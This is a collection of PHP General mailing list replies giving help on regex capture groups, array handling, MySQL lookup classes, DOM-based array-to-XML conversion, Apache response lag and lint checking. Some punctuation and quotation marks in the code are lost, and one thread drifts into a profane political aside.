Nitsan Bin-Nun schreef: Hi lista, I have been trying to figure this out for the last couple of hours but I'm lack of luck. Take a look at these regex's, the string that was inputed into the preg_replace (using Uis modificators) and the results: (the lists have correspondence to each other) ORIGINAL STRING http://www.zshare.net/video/541070871c7a8d9c http://www.guba.com/watch/2000821351 http://www.veoh.com/videos/v4609719YfsCFpf REGEX USED (with Uis modificators) http:\/\/(www\.|)zshare\.net\/video\/([^\/]+) $3 http:\/\/(www\.|)guba\.com\/watch\/([0-9]+) $3 http:\/\/(www\.|)veoh\.com\/videos\/([^\/]+) THE RETURNED STRING 41070871c7a8d9c 000821351 4609719YfsCFpf If you will go through this carefully you will notice that the first character of each matching group is being deleted. The regex's and the replacements string are being fetched from the database (mysql) and goes straight to the preg_replace function with the original string. I have no idea why this happens. I'm looking forward for your opinions and suggestions. php -r ' var_dump(preg_replace(#http:\/\/(www\.|)zshare\.net\/video\/([^\/]+)#Ui, \\2, http://www.zshare.net/video/541070871c7a8d9c;)); ' string(16) 541070871c7a8d9c given the above test I don't see the problem with the regexp (but you don't actually show the code so it's hard to tell), I'd probably look else where for the char munching culprit. Regards, Nitsan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] assign array values to variables
PJ schreef: Seems it should be simple, but how does one extract values from an array and assign them to a variable? foreach ($categoriesIN as $category) { 1. if $categoriesIN comes from a POST, use $_POST['categoriesIN'] instead. better yet use the filter extension (part of the core) to retrieve the input. 2. validate santize your input (the reason to use the filter extension) 3. WHY do you want to extract the values and assign them to vars? since you don't know the number of entries there is no point in creating a stack of variables of which you have no idea what they are even called or how many there are. instead loop the array or use an index into the array to find the data your looking for. you don't have to create a specific variable to use a piece of data the given element of an array is just as valid. 4. there is the extract() function ... use at your own risk. 5. do something like this: foreach ($array as $key = $val) $$key = $val; .. again use at your own risk. echo $categorybr; } or if(!empty($_POST['categoriesIN'])){ foreach( $_POST['categoriesIN'] as $key = $value) { echo value = $valuebr; } both show the values entered in the form but do not create a variable. Since the number of entries will vary, I cannot assign a number of variable names before knowing how many entries there may be. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Assign 2 values from Mysql to an array
Anton Heuschen schreef: This might sound trivial, but for the live of me cant seem to get it to work, and I am not familiar with such a thing. seems like you've done your best to make it sound as confusing as possible, this happens sometimes when you no longer see the wood for the trees :-) What I have is a query lets say : select country,name,population from USERS where id= 'some_id' ; 'USERS' seems like an odd namew for the table in question. Now I want to assign the result to one set (The above example might have 3+ entries per telephone, thus what would be nice is something like an array of per telephone? where do these telephones come from? is that a freudian slip? did the phone ring whilst you we're writing that sentence? keep reading ... it gets more php related as we go one ... : [id][country][name] = population .. or to be exact if I echo the value for each id and country and name to get the population value Like : Array { [id] array { [country] array { [0] = USA } [name] array { [0] = test } } I'm not grokking that array structure much. I dont know something like that, maybe Im over comlicating the question now even, the main thing is wondered was in the first place was with a standard query and variable assign, from the query like: select country,name,population from USERS where id= 'some_id' ; normally you would just assign each field to one variable. like $country = result[country] $name = result[name] sidenote: I never see the point of assign the vars like that anyhow, why not just use $result['name'] and do away with the exytra $name var? But now I want all 3 fields as one variable (which would be an array) ..but how ? why? I'd guess it's because you want to do a 'look-up' of the data, that would suggest you don't want to be extracting the data on a row by row basis, but rather grab all the data and parse it into a format you can use for multiple look ups, here's a little class idea,maybe it offers some inspiration/insight/relief (it untested because I can't be bothered to setup a DB): abstract class Populations { static function getAll($type = null) { self::init(); if ($type) { return isset(self::$data[$type]) ? self::$data[$type] : null; } return self::$data; } static function byId($id) { return self::get('names', intval($id)); } static function byPlaceName($name) { return self::get('names', strtolower(trim($name))); } static function byCountryName($name) { return self::get('countries', strtolower(trim($name))); } static private function get($k, $v) { self::init(); if (isset(self::$data[$k][$v])) return self::$data[$k][$v]; return null; } private static function init() { if (!isset(self::$data)) self::loadData(); } private static function loadData() { self::$data = array( 'ids' = array(), 'names' = array(), 'countries' = array(), ); // let's assume that the following query will only return // a reasonable number of rows (i.e. not a very large number) // let's also assume that a db connection has been setup $res = mysql_query('SELECT id, country, name, population FROM users'); if ($res mysql_num_rows($res)) { while ($row = mysql_fetch_assoc($res)) { $i = $row['id']; $n = strtolower(trim($row['name'])); $c = strtolower(trim($row['country'])); self::$data['ids'][$i] = self::$data['names'][$n] = $row['population']; if (!isset(self::$data['countries'][$c])) self::$data['countries'][$c] = 0; self::$data['countries'][$c] += $row['population']; } } } } you would use this class something like: echo Population::byId(1), \n; echo Population::byPlaceName(Texas), \n; echo Population::byCountryName(USA), \n; var_dump(Population::getAll(names)); var_dump(Population::getAll()); I hope I have not totally confused the question now. if you didn't then I probably have. enjoy. Thanks in advance -- PHP General
Re: [PHP] Assign 2 values from Mysql to an array
PJ schreef: Shawn McKenzie wrote: Dollah Ihsan wrote: I'm sorry if this is not what you're talking about... /** * assume your table structure just like this. * table: users * | id | country| name | population | * -- * | 1 |Texas | Fort Worth |40| * */ Woo hooo! Did we finally suceed from the union that's going to socialist shit? Are we once again the great Republic of Texas! Oowooo watch that socialist shit... it may the only thing that will save us from the ooze we're into bacause of the old ways of W and the rest of the greedy and warmongering bastards of our recent past. But, then, we're going to fix all the shit with money from the taxpayers to glorify the exploits of the very crooks who fucked us in the first place... we just don't learn from the past, do we? Don't worry as we trapse along, we'll just hang ourselves again and again... Dubya is a stinking socialist though ... no I don't grok that either. Hey Wait. let's kill this thread before someone gets hurt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Conclusion of use strict...
Hans Schultz schreef: Hehe, I don't agree with either :-) But I am still searching for some solution, and when (and if) I find it I will be happy to share with you (btw, obviously nobody shared experiences about that compiler) no, but did the comments I made about var vars and vars included via other [optional files] register? also you might consider something low key as a starting point, here's a handy little oneliner for the [bash] shell: find . -name \*.php \! -exec php -d error_reporting=4095 -d display_errors=1 -l {} \; Hans is the OP, the one you thought got it all wrong., you're actually agree with me ... which is as natural as it is inevitable ;-) LOL, right :) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOM recursion
Joanne Lane schreef: I am trying to create a class that recursively iterates over an array an creates XML tree to reflect a multidimensional array. I am not really a PHP coder, but am trying my hand. I've seen 'real coders' write stuff thats leagues worse. This is what I have so far. http://pastie.org/private/w75vyq9ub09p0uawteyieq I have tried a few methods, but I keep failing. Currently, all elements are appended to the root node. line 44 is the issue (kind of), you're always adding to the root node, regardless of 'level' the createNode func needs a little extra something, I played with it for a few minutes and come up with this .. probably not exactly what you need but it might offer a little inspiration (not I also changed the form of the input array a little): ?php class array2xml extends DomDocument { private $xpath; private $root; public function __construct($arr, $root='root') { parent::__construct(); /*** set the encoding ***/ $this-encoding = ISO-8859-1; /*** format the output ***/ $this-formatOutput = true; /*** create the root element ***/ $this-root = $this-appendChild($this-createElement( $root )); $this-xpath = new DomXPath($this); } /* * creates the XML representation of the array * * @accesspublic * @paramarrayThe array to convert */ public function createNode( $arr, $node = null) { if (is_null($node)) $node = $this-root; foreach($arr as $element = $value) { if (is_numeric($element)) { if (is_array($value)) self::createNode($value, $node); } else { $child = $this-createElement($element, (is_array($value) ? null : $value)); $node-appendChild($child); if (is_array($value)) self::createNode($value, $child); } } } /* * Return the generated XML as a string * * @accesspublic * @returnstring * */ public function __toString() { return $this-saveXML(); } /* * array2xml::query() - perform an XPath query on the XML representation of the array * @param str $query - query to perform * @return mixed */ public function query($query) { return $this-xpath-evaluate($query); } } $array = array('employees'= array('employee' = array( array( 'name'='bill smith', 'address'= array('number'=1, 'street'='funny'), 'age'=25), array( 'name'='tom jones', 'address'= array('number'=12, 'street'='bunny'), 'age'=88), array( 'name'='dudley doright', 'address'= array('number'=88, 'street'='munny'), 'age'=23), array( 'name'='nellie melba', 'address'= array('number'=83, 'street'='sunny'), 'age'=83))) ); try { $xml = new array2xml('root'); $xml-createNode( $array ); echo $xml; } catch (Exception $e) { var_dump($e); } How can I fix this so that the XML tree, correctly reflects the array tree. TIA J - http://www.phpwomen.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP script lag (5 secs) when declaring mime type.
Jsbeginner schreef: Hello, I don't know for sure is this problem is only related to PHP so I hope I've posted in the right list. My problem is that with certain headers my script takes about 5 seconds before sending the page, no matter how small the file I try to load... My server : Centos Apache 2.2 PHP 5.2.9 Here's my code : ?php header('Content-Type: application/x-javascript'); header('Content-Length: '.filesize('test.js')); readfile('test.js'); ? test.js is only a few lines long, and if I remove the header content type the file loads instantaniously do it's not a problem with readfile. I thought about zlib gzip taking maybe a long time to load but I've changed the compression level from 6 to 1 and the file still has a the same lag. My server responds very fast for eveything else except this script. Do you have an idea what might be causing this lag ? something to do with apache, usually we we see this it's something to do with DNS lookups ... unlikely in your case. I figure it's something to do with apaches' content negotiation, possibly it looks up your content-type for some reason but ends up not recognizing it (and tries alsort of stuff before giving up and just sending the output) http://httpd.apache.org/docs/2.0/content-negotiation.html question is do you really need application/x-javascript? won't text/javascript do just fine? or does that have the same problem? ... actually does the problem occur with any value for 'Content-Type'? Thanks in advance :) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Conclusion of use strict...
9el schreef: --- Use FreeOpenSourceSoftwares, Stop piracy, Let the developers live. Get a Free CD of Ubuntu mailed to your door without any cost. Visit : www.ubuntu.com -- do we need these extra bytes in every email? On Thu, Mar 5, 2009 at 4:35 AM, Jochem Maas joc...@iamjochem.com wrote: Hans Schultz schreef: Thanks for reply, I completely understood your answer even in previous thread, but you should understand few very simple things1. I am not working alone, so I can't make other people use tools I use (eclipse + PDT at the moment) 2. even if somehow I manage to do number 1 we also have some legacy code from where ocassionally popup some idiotic bug (like that I mentioned with typo in property name)I hope (because of 1 and 2) you can understand that eclipse + PDT is not answer to my problem. Now, since I need some way to do these checks for all code paths (and not just currently running one) that is why I am more interested for something able to do those checks in compile time (ie, my javac will report to me uninitialized variable if I have some code path that could miss initialization of variable I am using later); since almost everyone agreed that could be done by some compiler I found php compiler (that for fact really exist, and I even posted llnk to it), since I need to use windows for development and compiler has trial version for linux I was curious if someone used it and if it could help me with my problems.. So, question is NOT whether php is interpreted or compiled, or is there a compiler, question is rather is that compiler useful for my problem.Best regards 1. you should *try* to standardize everyone on a single IDE/tool-chain 2. a decent IDE will give warnings about vars that are [seemingly] uninitialized or used only once. 3. a compiler can't cover all situations (variable variables, vars defined in optional includes, etc) 4. there is no silver bullet. 5. try to compartmentalize code so that the scope of a var doesn't exceed the number of lines you can view in a single screen (makes it easier to spot typos, etc) 6. I am not a number. I completely agree with Hans, as PHP cant be directly compared to that of java's behaviour. Hans is the OP, the one you thought got it all wrong., you're actually agree with me ... which is as natural as it is inevitable ;-) All of your team should be using a single IDE or at least good IDEs like Zend Studio, Eclipse PDT, NetBeans PDT while Netbeans is currently the best. PHP is more of a loosely typed language you cant really rely on compile time or something like that to be able to detect old typo bugs etc. The other way is writing a separate engine to detect those sorts of bugs, but using IDE and checking them manually can only ensure the perfectness. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php